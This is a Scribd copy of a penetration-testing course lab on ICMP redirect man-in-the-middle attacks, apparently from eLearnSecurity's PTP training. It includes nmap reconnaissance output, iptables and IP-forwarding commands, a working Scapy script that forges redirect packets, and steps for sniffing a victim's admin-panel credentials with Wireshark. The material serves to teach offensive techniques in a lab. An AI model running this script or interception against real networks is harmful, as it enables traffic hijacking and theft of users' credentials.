Scribd
Upload
70 views13 pages

© 2018 Caendra, Inc. - Hera For PTP - ICMP Redirect Attack

This document describes how to perform an ICMP redirect man-in-the-middle attack against network traffic. It provides instructions on identifying the client and server networks and machines, configuring the attack system as a router, using Scapy to generate ICMP redirect packets, and intercepting traffic with Wireshark to obtain credentials for a web administration panel.

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
70 views13 pages

© 2018 Caendra, Inc. - Hera For PTP - ICMP Redirect Attack

This document describes how to perform an ICMP redirect man-in-the-middle attack against network traffic. It provides instructions on identifying the client and server networks and machines, configuring the attack system as a router, using Scapy to generate ICMP redirect packets, and intercepting traffic with Wireshark to obtain credentials for a web administration panel.

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 13

© 2018 Caendra, Inc.

| Hera for PTP | ICMP Redirect attack 1


In this lab scenario you have to mount a man in the middle interception attack against the
communication between a client and a server.

There are two networks:

• The clients network where you will be sitting together with a client machine
• The servers network

Here is the lab environment:

The network has been hardened to prevent the use of ARP-spoofing-based attacks. So, you have to find
another technique to use.

The client machine is using a web administration panel. Your goals are:

• Find the web administration panel


• Identify the client machine
• Steal some valid credentials for the web administration panel

© 2018 Caendra, Inc. | Hera for PTP | ICMP Redirect attack 2


• How to mount an innovative MITM attack
• How ICMP redirect packets work
• How to use scapy to create raw network packets
• How to use the routing and firewalling features of the Linux kernel

The best tool is your brain. Then you may need some of:

• Nmap
• Web Browser
• Wireshark
• Scapy
• A Linux machine

This is an educational challenge, so some of the following tasks will have some extra information to
guide you during the attack.

Identify the server and client networks. Identify the victim client and the target server.

© 2018 Caendra, Inc. | Hera for PTP | ICMP Redirect attack 3


Issuing the following commands will let you configure your machine as a router NATting your victim
address and hiding it from the router:

# echo 1 > /proc/sys/net/ipv4/ip_forward


# iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE

You can use the following scapy script to mount an ICMP redirect attack:

# Creating and sending ICMP redirect packets


originalRouterIP='<The router IP address>'
attackerIP='<Your VPN IP Address>'
victimIP='<The Victim IP Address>'
serverIP='<The Web Server IP Address>'

# We create an ICMP Redirect packet


ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ contain the original TCP SYN packet
# sent from the victimIP
redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP
fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

while True:
send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
# Press <enter>

© 2018 Caendra, Inc. | Hera for PTP | ICMP Redirect attack 4


Intercept the traffic exchanged between the victim machine and the target server and use it to get
access to the web administration interface.

Use the credentials found at the previous step to login in the web administration panel.

© 2018 Caendra, Inc. | Hera for PTP | ICMP Redirect attack 5


© 2018 Caendra, Inc. | Hera for PTP | ICMP Redirect attack 6
First of all, you have to identify the networks you can reach:

# ip route show dev tap0


10.23.56.0/24 via 10.100.13.1
10.100.13.0/24 proto kernel scope link src 10.100.13.20

Then you have to identify the live machines:

# nmap -sn -n 10.23.56.0/24 10.100.13.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2015-11-09 16:20 CET


Nmap scan report for 10.23.56.1
Host is up (0.27s latency).
Nmap scan report for 10.23.56.100
Host is up (0.17s latency).
Nmap scan report for 10.100.13.1
Host is up (0.15s latency).
MAC Address: C8:4C:75:AA:5C:E5 (Cisco Systems)
Nmap scan report for 10.100.13.126
Host is up (0.21s latency).
MAC Address: 00:02:B3:CD:97:2C (Intel)
Nmap scan report for 10.100.13.20
Host is up.
Nmap done: 512 IP addresses (5 hosts up) scanned in 22.65 seconds

© 2018 Caendra, Inc. | Hera for PTP | ICMP Redirect attack 7


Identify the victim and the server:

# nmap -sS -sV -n 10.23.56.100 10.100.13.126

Starting Nmap 6.47 ( http://nmap.org ) at 2015-11-09 16:27 CET


Nmap scan report for 10.23.56.100
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.100.13.126


Host is up (0.16s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open netbios-ssn
3389/tcp open ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:02:B3:CD:97:2C (Intel)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at


http://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 72.95 seconds

© 2018 Caendra, Inc. | Hera for PTP | ICMP Redirect attack 8


Since the 10.23.56.100 machine has an Apache service listening on port 80, it is clearly the server.
You can verify that by pointing your browser to its address:

Since the other machine is a Windows client, you can get some more information via SMB:

# nmap -sS -n --script smb-os-discovery 10.100.13.126

Starting Nmap 6.47 ( http://nmap.org ) at 2015-11-09 16:30 CET


Nmap scan report for 10.100.13.126

Host script results:


| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: els-PC
| NetBIOS computer name: ELS-PC
| Workgroup: WORKGROUP
|_ System time: 2015-11-09T07:29:37-08:00

Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds

© 2018 Caendra, Inc. | Hera for PTP | ICMP Redirect attack 9


You have to launch the following commands to setup your computer:

# echo 1 > /proc/sys/net/ipv4/ip_forward


# iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE

You can modify the values in the script you found in this manual to reflect the Router IP, victim, server
and your IP address, launch scapy and copy paste the script content in scapy to launch the attack.

The script should begin sending packets, and you should see something like the following:

root@tester:~/LABS/21# scapy
Welcome to Scapy (2.3.3)
>>> # Creating and sending ICMP redirect packets
<snip>
>>> # The ICMP packet payload /should/ contain the original TCP SYN packet
>>> # sent from the victimIP
>>> redirPayloadIP=IP()
>>> redirPayloadIP.src=victimIP
>>> redirPayloadIP.dst=serverIP
>>> fakeOriginalTCPSYN=TCP()
>>> fakeOriginalTCPSYN.flags="S"
>>> fakeOriginalTCPSYN.dport=80
>>> fakeOriginalTCPSYN.seq=444444444
>>> fakeOriginalTCPSYN.sport=55555
>>>
>>> while True:
... send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
... # Press <enter>
...
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.

© 2018 Caendra, Inc. | Hera for PTP | ICMP Redirect attack 10


Launch Wireshark on the tap0 interface and start sniffing data. If you configured everything correctly,
you will start collecting some HTTP traffic.

Hint: filter out the ICMP traffic generated by scapy by using the !icmp display filter:

© 2018 Caendra, Inc. | Hera for PTP | ICMP Redirect attack 11


If you rung a Follow TCP stream command on a login request you will see the full username and
password pair:

© 2018 Caendra, Inc. | Hera for PTP | ICMP Redirect attack 12


Now you can use those credentials to access the administration page:

© 2018 Caendra, Inc. | Hera for PTP | ICMP Redirect attack 13

You might also like